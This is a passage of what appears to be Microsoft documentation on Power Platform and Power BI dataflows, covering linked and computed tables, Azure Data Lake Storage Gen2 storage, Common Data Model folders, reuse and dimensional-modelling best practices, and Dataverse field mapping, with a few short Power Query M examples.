Linked tables are read-only, so if you want to create transformations for a linked table,
you must create a new computed table with a reference to the linked table.
Linked tables only work properly in new Power BI workspaces, and, likewise, all linked
dataflows must be located in new workspaces. More information: Create the new
workspaces in Power BI
7 Note
If your dataflow isn't located in a Premium capacity workspace, you can still
reference a single query—or combine two or more queries—as long as the
transformations aren't defined as in-storage transformations. Such references are
considered standard tables. To do this, turn off the Enable load option for the
referenced queries to prevent the data from being materialized and ingested into
storage. From there, you can reference those Enable load = false queries, and set
Enable load to On only for the resulting queries that you want to materialize.
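A minimal sketch of the pattern described in this note, with hypothetical query names: Sales2022 and Sales2023 have Enable load turned off, and only the combined query is materialized.

// Query "AllSales" (Enable load = On). It references two queries whose
// Enable load option is turned off, so only this combined result is stored.
let
    Source = Table.Combine({Sales2022, Sales2023})
in
    Source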
You can select Get data from the dataflow authoring tool, which displays a dialog box
for selecting the categories and each data source. Then select the Power Platform
Dataflows connector.
A connection window for the selected data connection is displayed. If credentials are
required, you're prompted to provide them.
In Power BI, you can select Add linked tables from the dataflow authoring tool.
You can also select Add linked tables from the Add tables menu in the Power BI service.
A Navigator window opens, and you can choose a set of tables you can connect to. The
window displays tables for which you have permissions across all workspaces and
environments in your organization.
After you select your linked tables, they appear in the list of tables for your dataflow in
the authoring tool, with a special icon identifying them as linked tables.
You can also view the source dataflow from the dataflow settings of your linked table.
Links in the same workspace: When data refresh occurs for a source dataflow, that
event automatically triggers a refresh process for dependent tables in all
destination dataflows in the same workspace, including any calculated tables
based on them. All other tables in the destination dataflow are refreshed according
to the dataflow schedule. Tables that depend on more than one source refresh
their data whenever any of their sources are refreshed successfully.
7 Note
The entire refresh process is committed at once. Because of this, if the data
refresh for the destination dataflow fails, the data refresh for the source
dataflow fails as well.
A table can be referenced by another dataflow. That referenced table can also be
referenced by other dataflows, and so on, up to five times.
Cyclical dependencies of linked tables aren't allowed.
The dataflow must be in a new Power BI workspace or a Power Apps environment.
A linked table can't be joined with a regular table that gets its data from an on-
premises data source.
When using M parameters to address linked tables, if the source dataflow is
refreshed, it doesn't automatically affect the data in the destination dataflow.
Attempting to connect two dataflow tables between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.
Next steps
The following articles might be useful as you create or work with dataflows:
The following articles provide more information about dataflows and Power BI:
For more information about Power Query and scheduled refresh, you can read these
articles:
For more information about Common Data Model, you can read its overview article:
You can configure dataflows to store their data in your organization's Azure Data Lake
Storage Gen2 account. This article describes the general steps necessary to do so, and
provides guidance and best practices along the way.
) Important
The dataflows with analytical tables feature uses the Azure Synapse Link for Dataverse
service, which may offer varying levels of compliance, privacy, security, and data
location commitments. For more information about Azure Synapse Link for
Dataverse, go to What is Azure Synapse Link for Dataverse?.
There are some advantages to configuring dataflows to store their definitions and
datafiles in your data lake, such as:
Azure Data Lake Storage Gen2 provides an enormously scalable storage facility for
data.
Dataflow data and definition files can be used by your IT department's developers to
take advantage of Azure data and artificial intelligence (AI) services, as demonstrated
in the GitHub samples from Azure data services.
It enables developers in your organization to integrate dataflow data into internal
applications and line-of-business solutions, using developer resources for
dataflows and Azure.
Requirements
To use Azure Data Lake Storage Gen2 for dataflows, you need the following:
A Power Apps environment. Any Power Apps plan will allow you to create
dataflows with Azure Data Lake Storage Gen2 as a destination. You'll need to be
authorized in the environment as a maker.
An Azure subscription. You need an Azure subscription to use Azure Data Lake
Storage Gen2.
A resource group. Use a resource group you already have, or create a new one.
An Azure storage account. The storage account must have the Data Lake Storage
Gen2 feature enabled.
Tip
If you don't have an Azure subscription, create a free trial account before you
begin.
1. The storage account must be created in the same Azure Active Directory tenant as
your Power Apps tenant.
2. We recommend that the storage account is created in the same region as the
Power Apps environment you plan to use it in. To determine where your Power
Apps environment is, contact your environment admin.
3. The storage account must have the hierarchical namespace feature enabled.
4. You must be granted an Owner role on the storage account.
The following sections walk through the steps necessary to configure your Azure Data
Lake Storage Gen2 account.
1. Make sure you select the same region as your environment and set your storage as
StorageV2 (general purpose v2).
2. Make sure you enable the hierarchical namespace feature.
3. We recommend that you set the replication setting to Read-access geo-redundant
storage (RA-GRS).
To connect your Azure Data Lake Storage Gen2 account with the dataflow, follow these
steps:
1. Sign in to Power Apps , and verify which environment you're in. The environment
switcher is located on the right side of the header.
2. On the left navigation pane, select the down arrow next to Data.
3. In the list that appears, select Dataflows and then on the command bar select New
dataflow.
4. Select the analytical tables you want. These tables indicate what data you want to
store in your organization's Azure Data Lake Storage Gen2 account.
Select the storage account to use for dataflow
storage
If a storage account hasn't yet been associated with the environment, a Link to data
lake dialog box appears. You'll need to sign in and find the data lake you created in the
previous steps. In this example, no data lake is associated with the environment and so a
prompt occurs to add one.
5. Select Save.
Once these steps are successfully completed, your Azure Data Lake Storage Gen2
account is connected to Power Platform Dataflows and you can continue to create a
dataflow.
Linking an Azure Data Lake Storage Gen2 account for dataflow storage isn't
supported in the default environment.
Once a dataflow storage location is configured for a dataflow, it can't be changed.
Once a storage account is linked, changing the environment's name isn't
supported, and dataflows linked to that storage account will fail. Changing the
environment's name back will re-enable those dataflows.
By default, any member of the environment can access dataflow data using the
Power Platform Dataflows Connector. However, only the owners of a dataflow can
access its files directly in Azure Data Lake Storage Gen2. To authorize more people
to access the dataflow's data directly in the lake, you must authorize them to the
dataflow's CDM Folder in the data lake or the data lake itself.
When a dataflow is deleted, its CDM Folder in the lake will also be deleted.
Attempting to connect two dataflow entities between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.
) Important
You shouldn't change files created by dataflows in your organization's lake or add
files to a dataflow's CDM Folder. Changing files might damage dataflows or alter
their behavior and is not supported. Power Platform Dataflows only grants read
access to files it creates in the lake. If you authorize other people or services to the
filesystem used by Power Platform Dataflows, only grant them read access to files
or folders in that filesystem.
Privacy notice
By enabling the creation of dataflows with Analytical tables in your organization, via the
Azure Synapse Link for Dataverse service, details about the Azure Data Lake storage
account, such as the name of the storage account, will be sent to and stored in the
Azure Synapse Link for Dataverse service, which is currently located outside the
PowerApps compliance boundary and may employ lesser or different privacy and
security measures than those typically in PowerApps. Note that you may remove the
data lake association at any time to discontinue use of this functionality and your Azure
Data Lake storage account details will be removed from the Azure Synapse Link for
Dataverse service. Further information about Azure Synapse Link for Dataverse is
available in this article.
You can't change the storage location of a dataflow after it's been created.
Next steps
This article provided guidance about how to connect an Azure Data Lake Storage Gen2
account for dataflow storage.
For more information about dataflows, the Common Data Model, and Azure Data Lake
Storage Gen2, go to these articles:
For more information about the Common Data Model, go to these articles:
Analytical dataflows store both data and metadata in Azure Data Lake Storage.
Dataflows leverage a standard structure to store and describe data created in the lake,
which is called Common Data Model folders. In this article, you'll learn more about the
storage standard that dataflows use behind the scenes.
When a dataflow is standard, the data is stored in Dataverse. However, when the
dataflow is analytical, the data is stored in Azure Data Lake Storage.
A dataflow’s data and metadata is stored in a Common Data Model folder. Since a
storage account might have multiple dataflows stored in it, a hierarchy of folders and
subfolders has been introduced to help organize the data. Depending on the product
the dataflow was created in, the folders and subfolders may represent workspaces (or
environments), and then the dataflow’s Common Data Model folder. Inside the
Common Data Model folder, both schema and data of the dataflow tables are stored.
This structure follows the standards defined for Common Data Model.
What is the Common Data Model storage
structure?
Common Data Model is a metadata structure defined to bring conformity and
consistency for using data across multiple platforms. Common Data Model isn't data
storage; it's the way that data is stored and defined.
Common Data Model folders define how a table's schema and its data should be stored.
In Azure Data Lake Storage, data is organized in folders. Folders can represent a
workspace or environment. Under those folders, subfolders for each dataflow are
created.
You can use this JSON file to migrate (or import) your dataflow into another workspace
or environment.
To learn exactly what the model.json metadata file includes, go to The metadata file
(model.json) for Common Data Model.
Data files
In addition to the metadata file, the dataflow folder includes other subfolders. A
dataflow stores the data for each table in a subfolder with the table's name. Data for a
table might be split into multiple data partitions, stored in CSV format.
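As a rough illustration (the folder and file names here are hypothetical, and the exact partition layout can vary by product), the hierarchy might look like this:

WorkspaceA/                        (workspace or environment folder)
    SalesDataflow/                 (the dataflow's Common Data Model folder)
        model.json                 (metadata describing the dataflow and its tables)
        Orders/                    (one subfolder per table)
            Orders-Part001.csv     (one or more CSV data partitions)
        Customers/
            Customers-Part001.csv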
If your organization enabled dataflows to take advantage of its Data Lake Storage
account and was selected as a load target for dataflows, you can still get data from the
dataflow by using the Power Platform dataflow connector as mentioned above. But you
can also access the dataflow's Common Data Model folder directly through the lake,
even outside of Power Platform tools and services. Access to the lake is possible through
the Azure portal, Microsoft Azure Storage Explorer, or any other service or experience
that supports Azure Data Lake Storage. More information: Connect Azure Data Lake
Storage Gen2 for dataflow storage
Next steps
Use the Common Data Model to optimize Azure Data Lake Storage Gen2
Standard dataflows always load data into Dataverse tables in an environment. Analytical
dataflows always load data into Azure Data Lake Storage accounts. For both dataflow
types, there's no need to provision or manage the storage. Dataflow storage, by default,
is provided and managed by the product the dataflow is created in.
Analytical dataflows allow an additional storage option: your organization's Azure Data
Lake Storage account. This option enables access to the data created by a dataflow
directly through Azure Data Lake Storage interfaces. Providing your own storage
account for analytical dataflows enables other Azure or line-of-business applications to
leverage the data by connecting to the lake directly.
Known limitations
After a dataflow is created, its storage location can't be changed.
Linked and computed entities features are only available when both dataflows are
in the same storage account.
Next steps
The articles below provide further information that can be helpful.
Connect Azure Data Lake Storage Gen2 for dataflow storage (Power BI dataflows)
Connect Azure Data Lake Storage Gen2 for dataflow storage (Power Platform
dataflows)
Creating computed entities in dataflows
The enhanced compute engine
Understanding the differences between standard and analytical dataflows
Computed table scenarios and use cases
Article • 08/04/2023
There are benefits to using computed tables in a dataflow. This article describes use
cases for computed tables and describes how they work behind the scenes.
Although it's possible to repeat the queries that created a table and apply new
transformations to them, this approach has drawbacks: data is ingested twice, and the
load on the data source is doubled.
Computed tables solve both problems. Computed tables are similar to other tables in
that they get data from a source and you can apply further transformations to create
them. But their data originates from the storage dataflow used, and not the original data
source. That is, they were previously created by a dataflow and then reused.
For example, if two tables share even a part of their transformation logic, without a
computed table, the transformation has to be done twice.
However, if a computed table is used, then the common (shared) part of the
transformation is processed once and stored in Azure Data Lake Storage. The remaining
transformations are then processed from the output of the common transformation.
Overall, this processing is much faster.
A computed table provides one place as the source code for the transformation and
speeds up the transformation because it only needs to be done once instead of multiple
times. The load on the data source is also reduced.
Using a reference from this table, you can build a computed table.
The computed table can have further transformations. For example, you can use Group
By to aggregate the data at the customer level.
This means that the Orders Aggregated table is getting data from the Orders table, and
not from the data source again. Because some of the transformations that need to be
done have already been done in the Orders table, performance is better and data
transformation is faster.
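As a brief sketch in M (the Orders query and column names are assumed for illustration), such a computed table might simply reference Orders and group it at the customer level:

// Query "Orders Aggregated": references the Orders table already stored in the
// dataflow and aggregates it per customer.
let
    Source = Orders,
    Grouped = Table.Group(Source, {"CustomerKey"},
        {{"OrderCount", each Table.RowCount(_), type number},
         {"TotalAmount", each List.Sum([Amount]), type number}})
in
    Grouped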
You might ask, what's the value of creating a source table that only ingests data? Such a
table can still be useful, because if the data from the source is used in more than one
table, it reduces the load on the data source. In addition, data can now be reused by
other people and dataflows. Computed tables are especially useful in scenarios where
the data volume is large, or when a data source is accessed through an on-premises
data gateway, because they reduce the traffic from the gateway and the load on data
sources behind them.
If the dataflow you're developing is getting bigger and more complex, here are some
things you can do to improve on your original design.
Having a custom function helps by keeping only a single version of the source code, so
you don't have to duplicate the code. As a result, maintaining the Power Query
transformation logic and the whole dataflow is much easier. For more information, go to
the following blog post: Custom Functions Made Easy in Power BI Desktop .
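As an illustration of this pattern (the function, source, and column names are hypothetical), a dataflow might hold the function in one query and invoke it from others:

// Query "CleanText": the shared custom function, defined once.
(input as nullable text) as nullable text =>
    if input = null then null else Text.Proper(Text.Trim(input))

// Query "Customers": invokes the shared function instead of duplicating the steps.
let
    Source = Sql.Database("sales-srv", "SalesDB"),
    Customers = Source{[Schema = "dbo", Item = "Customer"]}[Data],
    Cleaned = Table.TransformColumns(Customers, {{"CustomerName", CleanText, type text}})
in
    Cleaned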
7 Note
Sometimes you might receive a notification that tells you a premium capacity is
required to refresh a dataflow with a custom function. You can ignore this message
and reopen the dataflow editor. This usually solves your problem unless your
function refers to a "load enabled" query.
If you set up a separate schedule for the linked dataflow, dataflows can be refreshed
unnecessarily and block you from editing the dataflow. There are two recommendations
to avoid this problem:
Don't set a refresh schedule for a linked dataflow in the same workspace as the
source dataflow.
If you want to configure a refresh schedule separately and want to avoid the
locking behavior, move the dataflow to a separate workspace.
Best practices for reusing dataflows
across environments and workspaces
Article • 08/04/2023
This article discusses a collection of best practices for reusing dataflows effectively and
efficiently. Read this article to avoid design pitfalls and potential performance issues as
you develop dataflows for reuse.
If you have data transformation dataflows, you can split them into dataflows that do
common transformations. Each dataflow can do just a few actions. These few actions per
dataflow ensure that the output of that dataflow is reusable by other dataflows.
These levels of endorsement help users find reliable dataflows more easily and quickly. The
dataflow with a higher endorsement level appears first. The Power BI administrator can
delegate the ability to endorse dataflows to the certified level to other people. More
information: Endorsement - Promoting and certifying Power BI content
Separate tables in multiple dataflows
You can have multiple tables in one dataflow. One of the reasons you might split tables
into multiple dataflows is what you learned earlier in this article about separating the data
ingestion and data transformation dataflows. Another good reason to have tables in
multiple dataflows is when you want a different refresh schedule than other tables.
In the example shown in the following image, the sales table needs to be refreshed
every four hours. The date table needs to be refreshed only once a day to keep the
current date record updated. And a product-mapping table just needs to be refreshed
once a week. If you have all of these tables in one dataflow, you have only one refresh
option for them all. However, if you split these tables into multiple dataflows, you can
schedule the refresh of each dataflow separately.
Good table candidates for dataflow tables
When you develop solutions using Power Query in the desktop tools, you might ask
yourself: which of these tables are good candidates to be moved to a dataflow? The best
tables to be moved to the dataflow are those tables that need to be used in more than
one solution, or more than one environment or service. For example, the Date table
shown in the following image needs to be used in two separate Power BI files. Instead of
duplicating that table in each file, you can build the table in a dataflow as a table, and
reuse it in those Power BI files.
Best practices for creating a dimensional
model using dataflows
Article • 08/04/2023
Designing a dimensional model is one of the most common tasks you can do with a
dataflow. This article highlights some of the best practices for creating a dimensional
model using a dataflow.
Staging dataflows
One of the key points in any data integration system is to reduce the number of reads
from the source operational system. In the traditional data integration architecture, this
reduction is done by creating a new database called a staging database. The purpose of
the staging database is to load data as-is from the data source into the staging
database on a regular schedule.
The rest of the data integration will then use the staging database as the source for
further transformation and converting it to the dimensional model structure.
We recommend that you follow the same approach using dataflows. Create a set of
dataflows that are responsible for just loading data as-is from the source system (and
only for the tables you need). The result is then stored in the storage structure of the
dataflow (either Azure Data Lake Storage or Dataverse). This change ensures that the
read operation from the source system is minimal.
Next, you can create other dataflows that source their data from staging dataflows. The
benefits of this approach include:
Reducing the number of read operations from the source system, and reducing the
load on the source system as a result.
Reducing the load on data gateways if an on-premises data source is used.
Having an intermediate copy of the data for reconciliation purpose, in case the
source system data changes.
Making the transformation dataflows source-independent.
Transformation dataflows
When you've separated your transformation dataflows from the staging dataflows, the
transformation will be independent from the source. This separation helps if you're
migrating the source system to a new system. All you need to do in that case is to
change the staging dataflows. The transformation dataflows are likely to work without
any problem, because they're sourced only from the staging dataflows.
This separation also helps in case the source system connection is slow. The
transformation dataflow won't need to wait for a long time to get records coming
through a slow connection from the source system. The staging dataflow has already
done that part, and the data will be ready for the transformation layer.
Layered Architecture
A layered architecture is an architecture in which you perform actions in separate layers.
The staging and transformation dataflows can be two layers of a multi-layered dataflow
architecture. Performing actions in separate layers keeps the required maintenance to a minimum.
When you want to change something, you just need to change it in the layer in which
it's located. The other layers should all continue to work fine.
The following image shows a multi-layered architecture for dataflows in which their
tables are then used in Power BI datasets.
Use a computed table as much as possible
When you use the result of a dataflow in another dataflow, you're using the concept of
the computed table, which means getting data from an "already-processed-and-stored"
table. The same thing can happen inside a dataflow. When you reference a table from
another table, you can use the computed table. This is helpful when you have a set of
transformations that need to be done in multiple tables, which are called common
transformations.
In the previous image, the computed table gets the data directly from the source.
However, in the architecture of staging and transformation dataflows, it's likely that the
computed tables are sourced from the staging dataflows.
Build a star schema
The best dimensional model is a star schema model that has dimensions and fact tables
designed in a way that minimizes the time needed to query data from the model, and
that also makes the model easy to understand for the person visualizing the data.
It isn't ideal to bring data in the same layout of the operational system into a BI system.
The data tables should be remodeled. Some of the tables should take the form of a
dimension table, which keeps the descriptive information. Some of the tables should
take the form of a fact table, to keep the aggregatable data. The best layout for fact
tables and dimension tables to form is a star schema. More information: Understand star
schema and the importance for Power BI
Use a unique key value for dimensions
When building dimension tables, make sure you have a key for each one. This key
ensures that there are no many-to-many (or in other words, "weak") relationships
among dimensions. You can create the key by applying some transformation to make
sure a column or a combination of columns is returning unique rows in the dimension.
Then that combination of columns can be marked as a key in the table in the dataflow.
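A minimal M sketch of that idea (the staging query and column names are hypothetical): remove duplicate rows on the chosen column and then mark it as the key.

let
    Source = ProductStaging,                              // hypothetical staging query
    Distinct = Table.Distinct(Source, {"ProductCode"}),   // one row per key value
    Keyed = Table.AddKey(Distinct, {"ProductCode"}, true) // mark the column as primary key
in
    Keyed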
Do an incremental refresh for large fact tables
Fact tables are always the largest tables in the dimensional model. We recommend that
you reduce the number of rows transferred for these tables. If you have a very large fact
table, ensure that you use incremental refresh for that table. An incremental refresh can
be done in the Power BI dataset, and also the dataflow tables.
You can use incremental refresh to refresh only part of the data, the part that has
changed. There are multiple options to choose which part of the data to be refreshed
and which part to be persisted. More information: Using incremental refresh with Power
BI dataflows
One of the best practices for dataflow implementations is separating the responsibilities
of dataflows into two layers: data ingestion and data transformation. This pattern is
specifically helpful when dealing with multiple queries of slower data sources in one
dataflow, or multiple dataflows querying the same data sources. Instead of getting data
from a slow data source again and again for each query, the data ingestion process can
be done once, and the transformation can be done on top of that process. This article
explains the process.
This separation isn't only useful because of the performance improvement, it's also
helpful for the scenarios where an old legacy data source system has been migrated to a
new system. In those cases, only the data ingestion dataflows need to be changed. The
data transformation dataflows remain intact for this type of change.
Reuse in other tools and services
Separation of data ingestion dataflows from data transformation dataflows is helpful in
many scenarios. Another use case scenario for this pattern is when you want to use this
data in other tools and services. For this purpose, it's better to use analytical dataflows
and use your own Data Lake Storage as the storage engine. More information: Analytical
dataflows
Depending on the storage for the output of the Microsoft Power Platform dataflows,
you can use that output in other Azure services.
Azure Machine Learning can consume the output of dataflows and use it for
machine learning scenarios (for example, predictive analysis).
Azure Data Factory can get the output of dataflows on a much larger scale,
combined with the data from big data sources, for advanced data integration
solutions.
Azure Databricks can consume the output of dataflows for applied data science
algorithms and further AI with the big data scale in the Apache Spark back end.
Other Azure data services can use the output of Power Platform dataflows to do
further actions on that data.
In any of these services, use Azure Data Lake Storage as the source. You'll be able to
enter the details of your storage and connect to the data in it. The data is stored in CSV
format, and is readable through any of these tools and services. The following
screenshot shows how Azure Data Lake Storage is a source option for Azure Data
Factory.
In the standard dataflow, you can easily map fields from the dataflow query into
Dataverse tables. However, if the Dataverse table has lookup or relationship fields,
additional consideration is required to make sure this process works.
The tables and their relationship are fundamental concepts of designing a database. To
learn everything about relationships is beyond the scope of this article. However, we'll
discuss it in a general way here.
Let's say you want to store information about customers and their details, including
region, in Dataverse. You can keep everything in one table. Your table can be called
Customers, and it can contain fields, such as CustomerID, Name, Birthdate, and Region.
Now imagine that you have another table that also has the store's information. This
table can have fields, such as Store ID, Name, and Region. As you can see, the region is
repeated in both tables. There's no single place where you can get all regions; some of
the region's data is in the Customers table, and some of it is in the Stores table. If you
ever build an application or a report from this information, you always have to combine
the two regions' information into one.
What's done in the database design practice is to create a table for Region in scenarios
like the one described above. This Region table would have a Region ID, Name, and
other information about the region. The other two tables (Customers and Stores) will
have links to this table using a field (which can be Region ID if we have the ID in both
tables, or Name if it's unique enough to determine a region). This means having a
relationship from the Stores and Customers table to the Region table.
In Dataverse, there are a number of ways to create a relationship. One way is to create a
table, and then create a field in one table that's a relationship (or lookup) to another
table, as described in the next section.
After setting the key field, you can see the field in the mapping of the dataflow.
Known limitations
Mapping to polymorphic lookup fields is currently not supported.
Mapping to a multi-level lookup field, a lookup that points to another table's
lookup field, is currently not supported.
Lookup fields for Standard Tables, unless they contain alternate key fields as
described in this document, won't show up in the Map Tables dialog.
Dataflows don't guarantee correct loading order when loading data to tables
configured as hierarchical data structures.
The order of query execution, or loading order to Dataverse tables isn't
guaranteed. We recommend that you separate child and parent tables into two
dataflows, and first refresh the dataflow containing child artifacts.
Field mapping considerations for
standard dataflows
Article • 06/20/2023
When loading data into Dataverse tables, you'll need to map the source query's columns
in the dataflow's editing experience to the destination Dataverse table columns. Beyond
mapping of data, there are other considerations and best practices to take into account.
In this article, we cover the different dataflow settings that control the behavior of
dataflow refresh and, as a result, the data in the destination table. When a dataflow
refreshes, it can either:
Create new records on each refresh, even if such records already exist in the
destination table.
Create new records if they don't already exist in the table, or update existing
records if they already exist in the table. This behavior is called upsert.
Using a key column will indicate to the dataflow to upsert records into the destination
table, while not selecting a key will always create new records in the destination table.
A key column is a column that's unique and deterministic of a data row in the table. For
example, in an Orders table, if the Order ID is a key column, you shouldn't have two
rows with the same Order ID. Also, one Order ID—let's say an order with the ID 345—
should only represent one row in the table. To choose the key column for the table in
Dataverse from the dataflow, you need to set the key field in the Map Tables experience.
Having a primary key in the table ensures that even if you have duplicate data rows with
the same value in the field that's mapped to the primary key, the duplicate entries won't
be loaded into the table, and the table will always have a high quality of the data.
Having a table with a high quality of data is essential in building reporting solutions
based on the table.
The following image shows how you can choose the key column to be used when
upserting records to an existing Dataverse table:
Setting a table’s Unique ID column and using it as a key
field for upserting records into existing Dataverse tables
All Microsoft Dataverse table rows have unique identifiers defined as GUIDs. These
GUIDs are the primary key for each table. By default, a table's primary key can't be set by
dataflows, and is auto-generated by Dataverse when a record is created. There are
advanced use cases where leveraging the primary key of a table is desirable, for
example, integrating data with external sources while keeping the same primary key
values in both the external table and Dataverse table.
7 Note
To take advantage of a table’s unique identifier field, select Load to existing table in the
Map Tables page while authoring a dataflow. In the example shown in the image below,
we would like to load data into the CustomerTransactions table, and use the
TransactionID column from the data source as the unique identifier of the table.
You'll notice that in the Select key dropdown, the unique identifier—